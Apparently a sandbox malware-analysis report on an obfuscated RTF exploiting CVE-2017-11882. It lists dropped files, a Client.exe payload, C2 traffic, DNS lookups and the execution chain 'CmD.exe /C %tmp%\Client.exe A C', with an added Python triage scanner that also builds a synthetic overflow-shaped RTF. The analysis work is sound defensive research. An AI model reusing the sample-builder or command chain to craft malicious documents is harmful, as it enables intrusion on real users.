                                                  Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
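The two dropped files above show the whole delivery chain in static form: the Yara rules rtf_cve2017_11882_ole and EXP_potential_CVE_2017_11882 fire on the OLE compound file that WINWORD.EXE wrote to Content.Word, and the second file's preview carries the "Equation.3 EMBED" and "Package EMBED" strings of the embedded objects. The scanner below is an added example, not code from the report or from Joe Sandbox, showing how an analyst can triage an "Rtf.Obfuscated" dropper of this kind offline: it pulls every \objdata group out of the RTF, strips the control words, escapes and whitespace that obfuscated droppers plant inside the hex, parses the OLE1 ObjectHeader to recover the class name (Equation.3 versus Package), and then looks for an MTEF FONT record whose name is longer than the fixed stack buffer that Equation Editor copied it into, which is the CVE-2017-11882 shape. Assumptions are labelled in the code: FONT_NAME_LIMIT = 36 follows public analyses of the bug rather than anything stated in this report; the native data is scanned as flat bytes instead of being parsed as a compound file; and the sample RTF is constructed inline, not bytes from the analysed file.

```python
# Added example (not from the Joe Sandbox report or the analysed sample): static triage
# of the RTF -> OLE1 object -> Equation Editor (CVE-2017-11882) chain flagged above.
import re
import struct
from dataclasses import dataclass, field

FONT_NAME_LIMIT = 36  # assumption: EQNEDT32's fixed font-name stack buffer, per public analyses
EQN_HDR = b"\x1c\x00\x00\x00\x02\x00"  # EQNOLEFILEHDR start: cbHdr=0x1C, version=0x00020000
MTEF_V3 = b"\x03\x01\x01\x03"          # MTEF header: version 3, Windows, Equation Editor, v3
FONT_REC = re.compile(rb"\x08.{2}([^\x00]{1,1024})\x00", re.DOTALL)  # FONT: tag, tface, style, name, NUL

@dataclass
class ObjectFinding:
    class_name: str    # OLE1 ClassName, e.g. "Equation.3" or "Package"
    auto_update: bool  # \objupdate present: the object activates when the document opens
    native_size: int
    font_names: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        """Equation Editor object carrying a font name longer than its stack buffer."""
        return (self.class_name.lower().startswith("equation")
                and any(len(n) > FONT_NAME_LIMIT for n in self.font_names))

def objdata_groups(rtf: bytes):
    """Yield each \\objdata group body; brace-nesting aware so junk sub-groups don't cut it short."""
    for m in re.finditer(rb"\\objdata", rtf):
        i = start = m.end()
        depth = 1
        while i < len(rtf) and depth:
            c = rtf[i:i + 1]
            if c == b"\\":
                i += 1  # backslash escapes the next byte (control word or \{ \}), never a delimiter
            else:
                depth += (c == b"{") - (c == b"}")
            i += 1
        yield rtf[start:i - 1]

def clean_objdata_hex(group: bytes) -> bytes:
    """Drop the control words, escapes, braces and whitespace an obfuscated dropper plants in the hex."""
    g = re.sub(rb"\\'[0-9A-Fa-f]{2}", b"", group)  # \'hh escapes
    g = re.sub(rb"\\[A-Za-z]+-?\d*", b"", g)       # control words such as \par
    g = re.sub(rb"\\.", b"", g, flags=re.DOTALL)   # control symbols such as \* \{ \}
    g = re.sub(rb"[^0-9A-Fa-f]", b"", g)           # braces, CR/LF, filler characters
    return g[: len(g) & ~1]                        # drop a dangling nibble

def lp_string(buf: bytes, off: int):
    """OLE1 LengthPrefixedAnsiString: 4-byte length (including the NUL), then the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    return buf[off + 4: off + 4 + n].rstrip(b"\x00").decode("latin-1"), off + 4 + n

def parse_ole1(blob: bytes):
    """Parse the OLE1 ObjectHeader (MS-OLEDS) in \\objdata -> (class_name, format_id, native_data)."""
    version, fmt = struct.unpack_from("<II", blob, 0)  # FormatID 2 = embedded, 1 = linked
    if version != 0x00000501:
        raise ValueError("not an OLE1 ObjectHeader")
    class_name, off = lp_string(blob, 8)
    for _ in range(2):  # TopicName, ItemName: skipped
        _s, off = lp_string(blob, off)
    (size,) = struct.unpack_from("<I", blob, off)
    return class_name, fmt, blob[off + 4: off + 4 + size]

def mtef_font_names(native: bytes) -> list:
    """Names from MTEF FONT records after the Equation Native header. Flat byte scan (assumption/
    simplification): on a real sample extract the 'Equation Native' stream with olefile first."""
    idx = native.find(EQN_HDR)
    if idx < 0:
        return []
    body = native[idx + 28:]  # skip the 28-byte EQNOLEFILEHDR
    return [m.group(1) for m in FONT_REC.finditer(body)] if body.startswith(MTEF_V3) else []

def scan_rtf(rtf: bytes) -> list:
    auto = b"\\objupdate" in rtf
    findings = []
    for group in objdata_groups(rtf):
        try:
            cls, _fmt, native = parse_ole1(bytes.fromhex(clean_objdata_hex(group).decode("ascii")))
        except (ValueError, struct.error):
            continue  # not an OLE1 object
        findings.append(ObjectFinding(cls, auto, len(native), mtef_font_names(native)))
    return findings

# ---- constructed sample input: synthetic bytes, not taken from the analysed RTF ----
def _lp(s: bytes) -> bytes:
    return struct.pack("<I", len(s) + 1) + s + b"\x00" if s else struct.pack("<I", 0)
def _ole1(class_name: bytes, native: bytes) -> bytes:
    return (struct.pack("<II", 0x501, 2) + _lp(class_name) + _lp(b"") + _lp(b"")
            + struct.pack("<I", len(native)) + native)
def _equation_native(font_name: bytes) -> bytes:
    mtef = MTEF_V3 + b"\x0a" + b"\x0a\x01" + b"\x08\x5a\x5a" + font_name + b"\x00\x00"
    return struct.pack("<HIHI", 0x1c, 0x00020000, 0xc49e, len(mtef)) + bytes(16) + mtef
def _obfuscate(hexdata: bytes) -> bytes:  # mimic "Rtf.Obfuscated": case, CR/LF, junk words, groups
    chunks = [hexdata[i:i + 19] for i in range(0, len(hexdata), 19)]
    junk = [b"\\par\r\n", b" ", b"{\\*\\zzz }", b"\r\n"]
    return b"".join(c.upper() if i % 2 else c + junk[(i // 2) % 4] for i, c in enumerate(chunks))

SAMPLE_FONT_NAME = b"cmd.exe /c calc".ljust(44, b"A")  # 44 bytes > FONT_NAME_LIMIT: overflow shape
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}{\\*\\objdata "
              + _obfuscate(_ole1(b"Equation.3", _equation_native(SAMPLE_FONT_NAME)).hex().encode())
              + b"}}{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata "
              + _ole1(b"Package", b"filler bytes standing in for a compound file").hex().encode() + b"}}\\par}")
```

Run scan_rtf over the bytes of a real RTF and inspect each ObjectFinding: an Equation.3 object with an over-long font name and \objupdate set is the auto-triggering CVE-2017-11882 pattern, while a Package object is the OLE packager carrier that the "OLE streams with names of living off the land binaries" signature refers to. The heuristic regex can misfire on a stray 0x08 byte, so treat suspicious as a triage flag rather than a verdict; oletools' rtfobj performs the same extraction with a more complete RTF parser.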
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):948736
                                                  Entropy (8bit):7.246077385861013
                                                  Encrypted:false
                                                  SSDEEP:12288:mH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:A/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:D94161753531177B2FB80365ADDCBFA8
                                                  SHA1:560C1FB1BF46B5144896570B228C7189B187ED7F
                                                  SHA-256:A5FC090CA6391A09E1DD85FF29F9D3F25300829DE6C74426EA0C142A56EABC1D
                                                  SHA-512:957DCD9145153D77D26FA9066ADAAD1336977144AC02A1E9E00971A2AE2A07820B787AF0237A1B97567F6935CF4C5B51F79D863879D9A179AFC0FFD18BEEE1E1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 22%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.b.........."...0..>...8...........`... ....@.. ....................................@.....................................W....................................................................................................`..H...........b..dzG4e.,... ......................@....text....;...`...<...2.............. ..`.rsrc................n..............@..@.....................v.............. ..`.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:gAWY3n:qY3n
                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]..ZoneId=3..
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 8 18:07:02 2022, mtime=Mon Aug 8 18:07:02 2022, atime=Mon Aug 8 18:07:12 2022, length=2883613, window=hide
                                                  Category:dropped
                                                  Size (bytes):1204
                                                  Entropy (8bit):4.569449910987798
                                                  Encrypted:false
                                                  SSDEEP:24:8/N4ylhn/XTRKJkJHCn9Dze4HCn9DmDv3q6u7D:8fhn/XT04HCn1lHCnz60D
                                                  MD5:70A36B224D1C572B995BD556EF759DB3
                                                  SHA1:0CA78EEFCB96BD578DC302DAD8D06C6B13886761
                                                  SHA-256:05A6062747A4BB44506A265B36A2C5CD6FE3337B57B8D141994725F8345620C8
                                                  SHA-512:39C2C4AEDC51017041F05D32BF9FB227C60604C4604EAF30BDCE7B7EBE838B326D8FBD1E3352BF24219C420605D0A77A8AC722AB62B3B950A3744E11BD226984
                                                  Malicious:false
                                                  Preview:L..................F.... .......Z.......Z....6..Z.....,..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U...Desktop.d......QK.X.U.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...,..U. .SECURI~1.RTF..........U..U.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf.K.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):148
                                                  Entropy (8bit):4.980743826841669
                                                  Encrypted:false
                                                  SSDEEP:3:bDuMJluscbcTLqjQWC0LULeBCmxW9rbcTLqjQWC0LULeBCv:bCVwTeS0LCeBgrwTeS0LCeBs
                                                  MD5:F5B5C7A44D064A168B55B6546BEB143F
                                                  SHA1:DF650FE24365C0DF6B059F048104A0E458C87E56
                                                  SHA-256:A102AB1C9E3EE964697863D84AEADD8D4D36BA057DF75DC66AB8CED753A20090
                                                  SHA-512:9AAACF55B9357FC3E282C44D6E5E9514AEC3D7FCFC8FE60F0CE01A9EA92CA9729081CFC7896C411686D2E0C03729B5D72CA22F1D645634440A41145B6434E762
                                                  Malicious:false
                                                  Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                                  File type:Rich Text Format data, version 1, unknown character set
                                                  Entropy (8bit):4.78563050775552
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
                                                  File size:2883613
                                                  MD5:26111b2647fc8b1e3e123e825f716b94
                                                  SHA1:131907f569a2774c1800430ccf052896dc685ec0
                                                  SHA256:7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
                                                  SHA512:44c6bdb04ac725f0d73f53e4b770502033171213e0194899e781df10f9e2d3e80d50985f1c0500feda91f76948c1f04fa3a6713aab36d76c135b7df736ef23d3
                                                  SSDEEP:24576:tSRlUCdvKN2W0fKMjy7qXpGjbqi1VzEjCpqdf9bSrdMymS1W:c
                                                  TLSH:99D5A570B1B535C6E26F0172429FBC59521738C7B3C62D88811DEAF62ED4B7A7B41A0E
                                                  File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt
                                                  Icon Hash:e4eea2aaa4b4b4a4
                                                  Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                  0 | 0000128Dh | 2 | embedded | Package | 948903 | Client.exe | C:\Path\Client.exe | C:\Path\Client.exe | no
                                                  1 | 001DF7BDh | 2 | embedded | Equation.3 | 3072 | | | | no
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Aug 8, 2022 12:08:49.397722006 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
                                                  Aug 8, 2022 12:08:49.539129972 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
                                                  Aug 8, 2022 12:08:49.539345026 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
                                                  Aug 8, 2022 12:08:49.539773941 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
                                                  Aug 8, 2022 12:08:49.683424950 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
                                                  Aug 8, 2022 12:08:49.683451891 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
                                                  Aug 8, 2022 12:08:49.683665991 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
                                                  Aug 8, 2022 12:08:49.683860064 CEST | 49171 | 80 | 192.168.2.22 | 45.33.18.44
                                                  Aug 8, 2022 12:08:49.827022076 CEST | 80 | 49171 | 45.33.18.44 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.413953066 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.555061102 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.555181980 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.556029081 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.697192907 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.698842049 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.698944092 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.698975086 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.699006081 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.721349955 CEST | 49172 | 80 | 192.168.2.22 | 45.33.6.223
                                                  Aug 8, 2022 12:09:09.862656116 CEST | 80 | 49172 | 45.33.6.223 | 192.168.2.22
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Aug 8, 2022 12:08:49.188456059 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.352061987 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                                                  Aug 8, 2022 12:09:09.386590958 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                                                  Aug 8, 2022 12:09:09.732258081 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
                                                  Aug 8, 2022 12:09:09.754498959 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                                                  Aug 8, 2022 12:09:14.764194012 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
                                                  Aug 8, 2022 12:09:14.786825895 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                  Aug 8, 2022 12:08:49.188456059 CEST | 192.168.2.22 | 8.8.8.8 | 0xceee | Standard query (0) | www.magadirect.co.uk | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:09.352061987 CEST | 192.168.2.22 | 8.8.8.8 | 0xca44 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:09.732258081 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.luanaterra.online | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:14.764194012 CEST | 192.168.2.22 | 8.8.8.8 | 0xca6d | Standard query (0) | www.hogogala.com | A (IP address) | IN (0x0001)
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.18.44 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 72.14.185.43 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.30.197 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.20.235 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.79.19.196 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.56.79.23 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 96.126.123.244 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 72.14.178.174 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 198.58.118.167 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 173.255.194.134 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.23.183 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | No error (0) | www.magadirect.co.uk | | 45.33.2.79 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:09.386590958 CEST | 8.8.8.8 | 192.168.2.22 | 0xca44 | No error (0) | www.sqlite.org | | 45.33.6.223 | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:09.754498959 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | Name error (3) | www.luanaterra.online | none | none | A (IP address) | IN (0x0001)
                                                  Aug 8, 2022 12:09:14.786825895 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | www.hogogala.com | | 162.213.253.236 | A (IP address) | IN (0x0001)
                                                  • www.magadirect.co.uk
                                                  • www.sqlite.org
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.22 | 49171 | 45.33.18.44 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Aug 8, 2022 12:08:49.539773941 CEST | 1 | OUT | GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1
                                                  Host: www.magadirect.co.uk
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Aug 8, 2022 12:08:49.683424950 CEST | 1 | IN | HTTP/1.1 404 Not Found
                                                  server: openresty/1.13.6.1
                                                  date: Mon, 08 Aug 2022 10:08:49 GMT
                                                  content-type: text/html
                                                  content-length: 175
                                                  connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  1 | 192.168.2.22 | 49172 | 45.33.6.223 | 80 | C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Aug 8, 2022 12:09:09.556029081 CEST | 2 | OUT | GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Aug 8, 2022 12:09:09.698842049 CEST | 3 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  Date: Mon, 08 Aug 2022 10:09:09 GMT
                                                  Content-type: text/html; charset=utf-8
                                                  Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a
                                                  Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>


                                                  Target ID:0
                                                  Start time:12:07:13
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                  Imagebase:0x13f9e0000
                                                  File size:1423704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:2
                                                  Start time:12:07:15
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:3
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                  Imagebase:0x4a690000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:5
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                  Imagebase:0x1180000
                                                  File size:948736 bytes
                                                  MD5 hash:D94161753531177B2FB80365ADDCBFA8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
